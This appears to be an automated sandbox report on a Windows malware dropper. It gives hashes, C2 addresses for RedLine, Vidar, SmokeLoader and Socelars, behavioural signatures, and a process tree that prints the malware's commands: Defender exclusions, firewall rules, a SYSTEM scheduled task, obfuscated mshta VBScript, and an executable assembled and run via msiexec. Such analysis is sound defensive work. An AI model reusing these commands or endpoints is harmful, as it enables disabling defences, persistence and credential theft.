Overview
overview
10Static
static
01a53007f9...68.exe
windows7_x64
1001a53007f9...68.exe
windows10_x64
10022e3c30a1...66.exe
windows7_x64
10022e3c30a1...66.exe
windows10_x64
1002ca2b5bb7...35.exe
windows7_x64
1002ca2b5bb7...35.exe
windows10_x64
100d69cafe70...cd.exe
windows7_x64
100d69cafe70...cd.exe
windows10_x64
100df647f0a2...bc.exe
windows7_x64
100df647f0a2...bc.exe
windows10_x64
101df367eead...2c.exe
windows7_x64
101df367eead...2c.exe
windows10_x64
101e083736ae...33.exe
windows7_x64
101e083736ae...33.exe
windows10_x64
101e662d9025...7d.exe
windows7_x64
101e662d9025...7d.exe
windows10_x64
102010009ff5...59.exe
windows7_x64
102010009ff5...59.exe
windows10_x64
10243379992d...93.exe
windows7_x64
10243379992d...93.exe
windows10_x64
102d63a14e4a...1a.exe
windows7_x64
102d63a14e4a...1a.exe
windows10_x64
1030e6815ae0...51.exe
windows7_x64
130e6815ae0...51.exe
windows10_x64
1364d3b0e94...fa.exe
windows7_x64
10364d3b0e94...fa.exe
windows10_x64
103a4e2dfbd7...00.exe
windows7_x64
103a4e2dfbd7...00.exe
windows10_x64
104a4a606501...75.exe
windows7_x64
104a4a606501...75.exe
windows10_x64
104d89b00768...c0.exe
windows7_x64
104d89b00768...c0.exe
windows10_x64
10Analysis
-
max time kernel
180s -
max time network
212s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
09-11-2021 13:19
Static task
static1
Behavioral task
behavioral1
Sample
01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Resource
win10-en-20211104
Behavioral task
behavioral3
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-en-20211014
Behavioral task
behavioral4
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211104
Behavioral task
behavioral5
Sample
02ca2b5bb774890c50950ad93becc2851bac8d04c35464dad4854088c5db4135.exe
Resource
win7-en-20211014
Behavioral task
behavioral6
Sample
02ca2b5bb774890c50950ad93becc2851bac8d04c35464dad4854088c5db4135.exe
Resource
win10-en-20211104
Behavioral task
behavioral7
Sample
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win7-en-20211104
Behavioral task
behavioral8
Sample
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win10-en-20211014
Behavioral task
behavioral9
Sample
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
Resource
win7-en-20211104
Behavioral task
behavioral10
Sample
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
Resource
win10-en-20211014
Behavioral task
behavioral11
Sample
1df367eead22695952cce5131891dfec5c479da37cb3dac0403015ebb785032c.exe
Resource
win7-en-20211104
Behavioral task
behavioral12
Sample
1df367eead22695952cce5131891dfec5c479da37cb3dac0403015ebb785032c.exe
Resource
win10-en-20211014
Behavioral task
behavioral13
Sample
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
Resource
win7-en-20211104
Behavioral task
behavioral14
Sample
1e083736aeca35b40f45693442d37466fa7b61ab36b2cebc2a49cb8c8492a433.exe
Resource
win10-en-20211104
Behavioral task
behavioral15
Sample
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Resource
win7-en-20211014
Behavioral task
behavioral16
Sample
1e662d90254c17f35d76a81e33caff9c356d590244b00583c3bdb837a683607d.exe
Resource
win10-en-20211104
Behavioral task
behavioral17
Sample
2010009ff5b8b55fbcaa90318461a1b5b69ef6c8fd32ac279e81a10844d57859.exe
Resource
win7-en-20211014
Behavioral task
behavioral18
Sample
2010009ff5b8b55fbcaa90318461a1b5b69ef6c8fd32ac279e81a10844d57859.exe
Resource
win10-en-20211104
Behavioral task
behavioral19
Sample
243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Resource
win7-en-20211014
Behavioral task
behavioral20
Sample
243379992d4692a9058e9964696513a2f84e03759c6d5b3b737685bf9bf65493.exe
Resource
win10-en-20211104
Behavioral task
behavioral21
Sample
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
Resource
win7-en-20211104
Behavioral task
behavioral22
Sample
2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
Resource
win10-en-20211014
Behavioral task
behavioral23
Sample
30e6815ae008a8638c5b30460098904121e0b98c7e87784d950f1dc55aafec51.exe
Resource
win7-en-20211104
Behavioral task
behavioral24
Sample
30e6815ae008a8638c5b30460098904121e0b98c7e87784d950f1dc55aafec51.exe
Resource
win10-en-20211014
Behavioral task
behavioral25
Sample
364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa.exe
Resource
win7-en-20211104
Behavioral task
behavioral26
Sample
364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa.exe
Resource
win10-en-20211014
Behavioral task
behavioral27
Sample
3a4e2dfbd7943c7200d7c5ea70c2b0117408d3c1ac3cac7b757d8e05dcc9ff00.exe
Resource
win7-en-20211104
Behavioral task
behavioral28
Sample
3a4e2dfbd7943c7200d7c5ea70c2b0117408d3c1ac3cac7b757d8e05dcc9ff00.exe
Resource
win10-en-20211014
Behavioral task
behavioral29
Sample
4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe
Resource
win7-en-20211104
Behavioral task
behavioral30
Sample
4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe
Resource
win10-en-20211104
Behavioral task
behavioral31
Sample
4d89b007686d09c5143127f408435b76d2ea36991b728985ac47dcf797e6e7c0.exe
Resource
win7-en-20211014
General
-
Target
364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa.exe
-
Size
5.6MB
-
MD5
395991dd927c34de92ef13d9dad8664a
-
SHA1
d7a6e083fc39aa0933865549dd553e83e7f486bf
-
SHA256
364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa
-
SHA512
f27eb6c9c63e1a40dc675b40b419481b95e27e4ceff042fe94a0ef8a77568844900d962485cfd7a1035203161693cba320375b5cc57cd12c51695a5252d78fb3
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.znsjis.top/
Extracted
redline
ANI
194.104.136.5:46013
Extracted
redline
she
135.181.129.119:4805
Extracted
vidar
41.3
916
https://mas.to/@oleg98
-
profile_id
916
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1764 5072 rundll32.exe 130 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral26/memory/3016-257-0x00000000033D0000-0x00000000033EF000-memory.dmp family_redline behavioral26/memory/2020-260-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral26/memory/2020-262-0x000000000041B23A-mapping.dmp family_redline behavioral26/memory/3016-261-0x0000000003580000-0x000000000359D000-memory.dmp family_redline behavioral26/memory/2020-281-0x0000000005110000-0x0000000005716000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral26/files/0x000400000001ac04-191.dat family_socelars behavioral26/files/0x000400000001ac04-236.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral26/memory/1768-299-0x0000000000400000-0x0000000001729000-memory.dmp family_vidar behavioral26/memory/1768-301-0x00000000033E0000-0x00000000034B6000-memory.dmp family_vidar -
resource yara_rule behavioral26/files/0x000400000001ac01-130.dat aspack_v212_v242 behavioral26/files/0x000400000001ac01-131.dat aspack_v212_v242 behavioral26/files/0x000500000001abb7-127.dat aspack_v212_v242 behavioral26/files/0x000500000001abb7-126.dat aspack_v212_v242 behavioral26/files/0x000500000001abb7-124.dat aspack_v212_v242 behavioral26/files/0x000500000001abb9-123.dat aspack_v212_v242 behavioral26/files/0x000500000001abb9-122.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
pid Process 3600 setup_install.exe 3180 Sat0766fe31a9db7.exe 1644 Sat07c98d11717b81e.exe 1188 Sat07e9c37490fe.exe 2980 Sat07614156b9.exe 4084 Sat07d0d04161b77.exe 1276 mshta.exe 3016 Sat07ef90595a09690a.exe 2368 Sat070ac8db855946e70.exe 3104 Sat074f80a721d3d68.exe 1436 Sat07e9c37490fe.tmp 2304 Sat074e845efaeece03a.exe 1768 Sat078275687fbd9.exe 2172 Sat07d125711b.exe 3168 Sat078d56c22d5608.exe 1168 Sat07e9c37490fe.exe 868 Sat072bcdd89ba501.exe 1572 Sat07e9c37490fe.tmp 624 Sat07bef3fafabad89d.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 7 IoCs
pid Process 3600 setup_install.exe 3600 setup_install.exe 3600 setup_install.exe 3600 setup_install.exe 3600 setup_install.exe 3600 setup_install.exe 1436 Sat07e9c37490fe.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com 60 ipinfo.io 61 ipinfo.io 85 ipinfo.io 307 ipinfo.io 308 ipinfo.io 625 ipinfo.io 278 ipinfo.io 679 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 9 IoCs
pid pid_target Process procid_target 3820 3600 WerFault.exe 70 4604 2304 WerFault.exe 104 4852 2304 WerFault.exe 104 4292 2304 WerFault.exe 104 4588 2304 WerFault.exe 104 5020 2304 WerFault.exe 104 3868 1768 WerFault.exe 103 5152 4656 WerFault.exe 166 5380 6084 WerFault.exe 183 -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3488 schtasks.exe 4688 schtasks.exe 4128 schtasks.exe 5336 schtasks.exe 4060 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4744 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 3924 taskkill.exe 4796 taskkill.exe 4908 taskkill.exe 5976 taskkill.exe 4784 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3968 powershell.exe 3968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeDebugPrivilege 1644 Sat07c98d11717b81e.exe Token: SeDebugPrivilege 3968 powershell.exe Token: SeCreateTokenPrivilege 868 Sat072bcdd89ba501.exe Token: SeAssignPrimaryTokenPrivilege 868 Sat072bcdd89ba501.exe Token: SeLockMemoryPrivilege 868 Sat072bcdd89ba501.exe Token: SeIncreaseQuotaPrivilege 868 Sat072bcdd89ba501.exe Token: SeMachineAccountPrivilege 868 Sat072bcdd89ba501.exe Token: SeTcbPrivilege 868 Sat072bcdd89ba501.exe Token: SeSecurityPrivilege 868 Sat072bcdd89ba501.exe Token: SeTakeOwnershipPrivilege 868 Sat072bcdd89ba501.exe Token: SeLoadDriverPrivilege 868 Sat072bcdd89ba501.exe Token: SeSystemProfilePrivilege 868 Sat072bcdd89ba501.exe Token: SeSystemtimePrivilege 868 Sat072bcdd89ba501.exe Token: SeProfSingleProcessPrivilege 868 Sat072bcdd89ba501.exe Token: SeIncBasePriorityPrivilege 868 Sat072bcdd89ba501.exe Token: SeCreatePagefilePrivilege 868 Sat072bcdd89ba501.exe Token: SeCreatePermanentPrivilege 868 Sat072bcdd89ba501.exe Token: SeBackupPrivilege 868 Sat072bcdd89ba501.exe Token: SeRestorePrivilege 868 Sat072bcdd89ba501.exe Token: SeShutdownPrivilege 868 Sat072bcdd89ba501.exe Token: SeDebugPrivilege 868 Sat072bcdd89ba501.exe Token: SeAuditPrivilege 868 Sat072bcdd89ba501.exe Token: SeSystemEnvironmentPrivilege 868 Sat072bcdd89ba501.exe Token: SeChangeNotifyPrivilege 868 Sat072bcdd89ba501.exe Token: SeRemoteShutdownPrivilege 868 Sat072bcdd89ba501.exe Token: SeUndockPrivilege 868 Sat072bcdd89ba501.exe Token: SeSyncAgentPrivilege 868 Sat072bcdd89ba501.exe Token: SeEnableDelegationPrivilege 868 Sat072bcdd89ba501.exe Token: SeManageVolumePrivilege 868 Sat072bcdd89ba501.exe Token: SeImpersonatePrivilege 868 Sat072bcdd89ba501.exe Token: SeCreateGlobalPrivilege 868 Sat072bcdd89ba501.exe Token: 31 868 Sat072bcdd89ba501.exe Token: 32 868 Sat072bcdd89ba501.exe Token: 33 868 Sat072bcdd89ba501.exe Token: 34 868 Sat072bcdd89ba501.exe Token: 35 868 Sat072bcdd89ba501.exe Token: SeRestorePrivilege 3820 WerFault.exe Token: SeBackupPrivilege 3820 WerFault.exe Token: SeDebugPrivilege 3168 Sat078d56c22d5608.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 360 wrote to memory of 3600 360 364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa.exe 70 PID 360 wrote to memory of 3600 360 364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa.exe 70 PID 360 wrote to memory of 3600 360 364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa.exe 70 PID 3600 wrote to memory of 2016 3600 setup_install.exe 73 PID 3600 wrote to memory of 2016 3600 setup_install.exe 73 PID 3600 wrote to memory of 2016 3600 setup_install.exe 73 PID 3600 wrote to memory of 1072 3600 setup_install.exe 74 PID 3600 wrote to memory of 1072 3600 setup_install.exe 74 PID 3600 wrote to memory of 1072 3600 setup_install.exe 74 PID 3600 wrote to memory of 608 3600 setup_install.exe 116 PID 3600 wrote to memory of 608 3600 setup_install.exe 116 PID 3600 wrote to memory of 608 3600 setup_install.exe 116 PID 3600 wrote to memory of 1732 3600 setup_install.exe 75 PID 3600 wrote to memory of 1732 3600 setup_install.exe 75 PID 3600 wrote to memory of 1732 3600 setup_install.exe 75 PID 3600 wrote to memory of 3296 3600 setup_install.exe 76 PID 3600 wrote to memory of 3296 3600 setup_install.exe 76 PID 3600 wrote to memory of 3296 3600 setup_install.exe 76 PID 3600 wrote to memory of 3184 3600 setup_install.exe 77 PID 3600 wrote to memory of 3184 3600 setup_install.exe 77 PID 3600 wrote to memory of 3184 3600 setup_install.exe 77 PID 3600 wrote to memory of 3796 3600 setup_install.exe 115 PID 3600 wrote to memory of 3796 3600 setup_install.exe 115 PID 3600 wrote to memory of 3796 3600 setup_install.exe 115 PID 3600 wrote to memory of 3784 3600 setup_install.exe 78 PID 3600 wrote to memory of 3784 3600 setup_install.exe 78 PID 3600 wrote to memory of 3784 3600 setup_install.exe 78 PID 2016 wrote to memory of 3968 2016 cmd.exe 113 PID 2016 wrote to memory of 3968 2016 cmd.exe 113 PID 2016 wrote to memory of 3968 2016 cmd.exe 113 PID 608 wrote to memory of 3180 608 cmd.exe 114 PID 608 wrote to memory of 3180 608 cmd.exe 114 PID 608 wrote to memory of 3180 608 cmd.exe 114 PID 3600 wrote to memory of 1020 3600 setup_install.exe 112 PID 3600 wrote to memory of 1020 3600 setup_install.exe 112 PID 3600 wrote to memory of 1020 3600 setup_install.exe 112 PID 3600 wrote to memory of 1096 3600 setup_install.exe 111 PID 3600 wrote to memory of 1096 3600 setup_install.exe 111 PID 3600 wrote to memory of 1096 3600 setup_install.exe 111 PID 1072 wrote to memory of 1644 1072 cmd.exe 79 PID 1072 wrote to memory of 1644 1072 cmd.exe 79 PID 3600 wrote to memory of 1044 3600 setup_install.exe 80 PID 3600 wrote to memory of 1044 3600 setup_install.exe 80 PID 3600 wrote to memory of 1044 3600 setup_install.exe 80 PID 3600 wrote to memory of 992 3600 setup_install.exe 110 PID 3600 wrote to memory of 992 3600 setup_install.exe 110 PID 3600 wrote to memory of 992 3600 setup_install.exe 110 PID 3296 wrote to memory of 1188 3296 cmd.exe 81 PID 3296 wrote to memory of 1188 3296 cmd.exe 81 PID 3296 wrote to memory of 1188 3296 cmd.exe 81 PID 3600 wrote to memory of 1284 3600 setup_install.exe 108 PID 3600 wrote to memory of 1284 3600 setup_install.exe 108 PID 3600 wrote to memory of 1284 3600 setup_install.exe 108 PID 3184 wrote to memory of 2980 3184 cmd.exe 85 PID 3184 wrote to memory of 2980 3184 cmd.exe 85 PID 1732 wrote to memory of 4084 1732 cmd.exe 109 PID 1732 wrote to memory of 4084 1732 cmd.exe 109 PID 1732 wrote to memory of 4084 1732 cmd.exe 109 PID 3784 wrote to memory of 1276 3784 cmd.exe 84 PID 3784 wrote to memory of 1276 3784 cmd.exe 84 PID 3784 wrote to memory of 1276 3784 cmd.exe 84 PID 3600 wrote to memory of 2328 3600 setup_install.exe 83 PID 3600 wrote to memory of 2328 3600 setup_install.exe 83 PID 3600 wrote to memory of 2328 3600 setup_install.exe 83
Processes
-
C:\Users\Admin\AppData\Local\Temp\364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa.exe"C:\Users\Admin\AppData\Local\Temp\364d3b0e9456ecff4518f48695df817af1fdcd76c1f9644a35cfe5ec621e5ffa.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat07c98d11717b81e.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07c98d11717b81e.exeSat07c98d11717b81e.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat07d0d04161b77.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\7zS86117CE6\Sat07d0d04161b77.exeSat07d0d04161b77.exe4⤵
- Executes dropped EXE
PID:4084 -
C:\Users\Admin\Pictures\Adobe Films\m37HUgLNuuiWIV9IIpzgSVky.exe"C:\Users\Admin\Pictures\Adobe Films\m37HUgLNuuiWIV9IIpzgSVky.exe"5⤵PID:4252
-
-
C:\Users\Admin\Pictures\Adobe Films\jcY8dnZn8uZZ3xKr9zeTGrSG.exe"C:\Users\Admin\Pictures\Adobe Films\jcY8dnZn8uZZ3xKr9zeTGrSG.exe"5⤵PID:3972
-
-
C:\Users\Admin\Pictures\Adobe Films\2NXoJhDBNQskbQ12kC2n3rbT.exe"C:\Users\Admin\Pictures\Adobe Films\2NXoJhDBNQskbQ12kC2n3rbT.exe"5⤵PID:1216
-
-
C:\Users\Admin\Pictures\Adobe Films\E2kSkgtOcJfP4HTrLwdDc2xg.exe"C:\Users\Admin\Pictures\Adobe Films\E2kSkgtOcJfP4HTrLwdDc2xg.exe"5⤵PID:2200
-
-
C:\Users\Admin\Pictures\Adobe Films\KlCPKlpYyt9wTSmtbnEAkUBI.exe"C:\Users\Admin\Pictures\Adobe Films\KlCPKlpYyt9wTSmtbnEAkUBI.exe"5⤵PID:4408
-
-
C:\Users\Admin\Pictures\Adobe Films\S8DpTLKCEJzinXH8IgyM2rOO.exe"C:\Users\Admin\Pictures\Adobe Films\S8DpTLKCEJzinXH8IgyM2rOO.exe"5⤵PID:4268
-
C:\Users\Admin\Pictures\Adobe Films\S8DpTLKCEJzinXH8IgyM2rOO.exe"C:\Users\Admin\Pictures\Adobe Films\S8DpTLKCEJzinXH8IgyM2rOO.exe"6⤵PID:4656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 247⤵
- Program crash
PID:5152
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yxMGhJeb5i5kCccUp01r0Kxi.exe"C:\Users\Admin\Pictures\Adobe Films\yxMGhJeb5i5kCccUp01r0Kxi.exe"5⤵PID:4700
-
C:\Users\Admin\Pictures\Adobe Films\yxMGhJeb5i5kCccUp01r0Kxi.exe"C:\Users\Admin\Pictures\Adobe Films\yxMGhJeb5i5kCccUp01r0Kxi.exe"6⤵PID:5476
-
-
-
C:\Users\Admin\Pictures\Adobe Films\R_epGrwGN3_JEUInC9xUS5Km.exe"C:\Users\Admin\Pictures\Adobe Films\R_epGrwGN3_JEUInC9xUS5Km.exe"5⤵PID:4832
-
-
C:\Users\Admin\Pictures\Adobe Films\4EHugnbTQqjnVho5o_9Fjtk0.exe"C:\Users\Admin\Pictures\Adobe Films\4EHugnbTQqjnVho5o_9Fjtk0.exe"5⤵PID:4572
-
-
C:\Users\Admin\Pictures\Adobe Films\Goinmy_vmF9LqJH1boJXqfMD.exe"C:\Users\Admin\Pictures\Adobe Films\Goinmy_vmF9LqJH1boJXqfMD.exe"5⤵PID:4528
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\Goinmy_vmF9LqJH1boJXqfMD.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\Goinmy_vmF9LqJH1boJXqfMD.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵PID:5064
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\Goinmy_vmF9LqJH1boJXqfMD.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\Goinmy_vmF9LqJH1boJXqfMD.exe" ) do taskkill -im "%~NxK" -F7⤵PID:4364
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP8⤵PID:6028
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )9⤵PID:4432
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F10⤵PID:4968
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )9⤵PID:6108
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY10⤵PID:4076
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "11⤵PID:348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"11⤵PID:5264
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY11⤵PID:4760
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "Goinmy_vmF9LqJH1boJXqfMD.exe" -F8⤵
- Kills process with taskkill
PID:5976
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rPpCiXxwlemAq7PfnaLdOr0S.exe"C:\Users\Admin\Pictures\Adobe Films\rPpCiXxwlemAq7PfnaLdOr0S.exe"5⤵PID:4436
-
-
C:\Users\Admin\Pictures\Adobe Films\jtbuvb88_nbTGD6netppcvx5.exe"C:\Users\Admin\Pictures\Adobe Films\jtbuvb88_nbTGD6netppcvx5.exe"5⤵PID:5864
-
-
C:\Users\Admin\Pictures\Adobe Films\TWkpjZGiqFzOJ7Whgnf0j03S.exe"C:\Users\Admin\Pictures\Adobe Films\TWkpjZGiqFzOJ7Whgnf0j03S.exe"5⤵PID:5856
-
-
C:\Users\Admin\Pictures\Adobe Films\N66otsTGz7KtLCEMUuRJGzT2.exe"C:\Users\Admin\Pictures\Adobe Films\N66otsTGz7KtLCEMUuRJGzT2.exe"5⤵PID:5848
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\6⤵PID:672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \6⤵PID:5448
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵PID:4668
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM6⤵
- Creates scheduled task(s)
PID:3488
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵PID:780
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal6⤵PID:4316
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵PID:3840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵PID:916
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:1404
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:4744
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zpBjmoyVsPI9tFbHHNPOVXMt.exe"C:\Users\Admin\Pictures\Adobe Films\zpBjmoyVsPI9tFbHHNPOVXMt.exe"5⤵PID:5840
-
-
C:\Users\Admin\Pictures\Adobe Films\1wieVP4wMblK1tTpYUYkhy4x.exe"C:\Users\Admin\Pictures\Adobe Films\1wieVP4wMblK1tTpYUYkhy4x.exe"5⤵PID:5832
-
-
C:\Users\Admin\Pictures\Adobe Films\w340Ug2qux7LP3ewEKFoT23L.exe"C:\Users\Admin\Pictures\Adobe Films\w340Ug2qux7LP3ewEKFoT23L.exe"5⤵PID:5824
-
-
